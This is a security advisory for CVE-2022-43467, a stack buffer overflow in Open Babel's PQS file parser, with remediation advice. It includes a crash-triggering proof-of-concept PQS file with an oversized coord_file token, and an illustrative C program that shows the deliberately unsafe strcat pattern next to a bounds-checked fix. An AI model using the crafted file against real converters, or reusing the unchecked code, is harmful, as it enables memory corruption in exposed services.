high · 7.8 · CVE-2022-43467 · Jul 1, 2026

CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A crafted PQS chemistry file can overflow a fixed-size stack buffer in Open Babel's parser, enabling arbitrary code execution in any application that opens untrusted chemical files.

Package: openbabel
Ecosystem: pip
Affected: < 3.2.0
Fixed in: 3.2.0

The problem

The PQS format reader in PQSformat.cpp declares two fixed-size stack buffers: `char coord_file[256]` and `char full_coord_path[256]`. When it encounters a `geom` keyword it reads the `coord_file` specifier from the input line and concatenates it into `full_coord_path` using `strcat`, with no length check on either the token or the destination buffer.

Any caller of the Open Babel library is exposed: the `obabel` CLI, the `OBConversion` C++ API, and all language bindings (Python, Ruby, Java, R, Perl, C#, PHP). Because online chemistry converters commonly embed the library server-side, the attack surface extends beyond local file open.

Proof of concept

A working proof-of-concept for CVE-2022-43467 in openbabel, with the exact payload below.

```text
# strcat.pqs  --  triggers CVE-2022-43467
# Feed to:  obabel -i pqs strcat.pqs -o sdf
#
# The coord_file value is 260 'A' characters, overflowing the
# 256-byte full_coord_path stack buffer via strcat().
geom=file coord_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$basis
 sto-3g
$end
$molecule
 0 1
 H  0.0  0.0  0.0
 H  0.0  0.0  0.7
$end
```

The parser scans for a line containing `geom` (but not `text` or `titl`), then extracts the `coord_file` token from that same line. It calls `strcat(full_coord_path, coord_file)` to build the final path. Because `full_coord_path` is only 256 bytes and no length check gates the concatenation, a coord_file token longer than 255 bytes writes past the end of the stack buffer (CWE-787, CWE-119).

The ASAN report from Talos shows `WRITE of size 251` at `__interceptor_strcat` called from `PQSformat.cpp:234`, confirming a classic unbounded `strcat` overflow. The fix in commit 2a7d2cda replaces the raw `strcat` with a bounds-checked alternative (or switches to `std::string`), so oversized `coord_file` values are rejected before any write past the buffer can occur.

The fix

Upgrade openbabel to 3.2.0, which contains commit 2a7d2cda. If you cannot upgrade immediately, refuse to parse PQS files from untrusted sources, or wrap the `OBConversion` call in a sandboxed process. Distributions (Debian, Fedora, etc.) have the fix tracked; check your distro's security tracker for backported packages.
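To make the bug class and its remedy concrete, the following C program is an added illustration written for this page; it is not Open Babel's PQSformat.cpp and not the code in commit 2a7d2cda. It models the pattern the advisory describes (a 256-byte stack buffer filled by concatenating a directory prefix and the `coord_file` token from a `geom` line) and shows the unchecked `strcat` pattern beside a bounds-checked handler that rejects a token before anything is written. The function names (`extract_coord_file`, `build_path_unchecked`, `build_path_checked`, `handle_geom_line`, `demo_token_of_length`), the `./` directory prefix and the constructed sample lines are assumptions made for the example; only the 256-byte buffer size comes from the page.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Buffer size taken from the advisory (char full_coord_path[256]). */
#define PATH_BUF_SIZE 256

/* Pull the value following "coord_file=" out of one input line.
 * Returns the token length copied into `out`, or -1 if the key is absent
 * or the token (plus its NUL) would not fit in `out_size` bytes. */
static int extract_coord_file(const char *line, char *out, size_t out_size) {
    const char *p = strstr(line, "coord_file=");
    if (p == NULL) return -1;
    p += strlen("coord_file=");
    size_t n = strcspn(p, " \t\r\n");   /* token ends at the first whitespace */
    if (n + 1 > out_size) return -1;     /* reject instead of truncating silently */
    memcpy(out, p, n);
    out[n] = '\0';
    return (int)n;
}

/* The vulnerable pattern (CWE-787): strcat() knows nothing about the size of
 * `full_path`, so a long coord_file token writes past the end of it.
 * Shown for comparison only; handle_geom_line() never calls it. */
void build_path_unchecked(char *full_path, const char *dir, const char *coord_file) {
    strcpy(full_path, dir);
    strcat(full_path, coord_file);
}

/* Bounds-checked replacement: compute the required length first and refuse to
 * build the path unless dir + coord_file + NUL fits in `full_size` bytes. */
static int build_path_checked(char *full_path, size_t full_size,
                              const char *dir, const char *coord_file) {
    size_t need = strlen(dir) + strlen(coord_file) + 1;
    if (need > full_size) return -1;
    /* snprintf would truncate on its own, but the check above makes the
     * failure explicit so the caller can reject the input. */
    snprintf(full_path, full_size, "%s%s", dir, coord_file);
    return 0;
}

/* Handle one "geom" line the way a fixed reader should: extract the token into
 * a bounded buffer, then build the path only if it fits.
 * Returns 0 on success and -1 if the line is rejected. */
int handle_geom_line(const char *line, const char *dir,
                     char *full_path, size_t full_size) {
    char coord_file[PATH_BUF_SIZE];
    if (extract_coord_file(line, coord_file, sizeof coord_file) < 0) return -1;
    return build_path_checked(full_path, full_size, dir, coord_file);
}

/* Returns 1 if a short, well-formed token produces the expected "./h2.xyz". */
int demo_normal_path(void) {
    char full_path[PATH_BUF_SIZE];
    /* Constructed sample line, not taken from any real PQS file. */
    if (handle_geom_line("geom=file coord_file=h2.xyz\n", "./",
                         full_path, sizeof full_path) != 0) return 0;
    return strcmp(full_path, "./h2.xyz") == 0;
}

/* Build a geom line whose coord_file token is `token_len` 'A' characters
 * (constructed input, mirroring the shape of the advisory's payload) and run
 * it through the checked handler. Returns 0 if accepted, -1 if rejected. */
int demo_token_of_length(size_t token_len) {
    char line[1024];
    const char *prefix = "geom=file coord_file=";
    size_t plen = strlen(prefix);
    if (plen + token_len + 2 > sizeof line) return -1;  /* keep the sample itself in bounds */
    memcpy(line, prefix, plen);
    memset(line + plen, 'A', token_len);
    line[plen + token_len] = '\n';
    line[plen + token_len + 1] = '\0';
    char full_path[PATH_BUF_SIZE];
    return handle_geom_line(line, "./", full_path, sizeof full_path);
}

int main(void) {
    printf("short token accepted:    %d\n", demo_normal_path());
    printf("253-byte token accepted: %d\n", demo_token_of_length(253) == 0);
    printf("260-byte token rejected: %d\n", demo_token_of_length(260) == -1);
    return 0;
}
```

With a two-byte `./` prefix the checked handler accepts tokens up to 253 bytes and rejects anything longer; the 260-byte token from the advisory's payload is rejected at the extraction step, before `full_path` is touched. The same length check is the kind of gate the advisory says the patched reader adds ahead of the concatenation.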

Reported by Claudio Bozzato, Cisco Talos.

References: [1][2][3][4][5][6]

Related research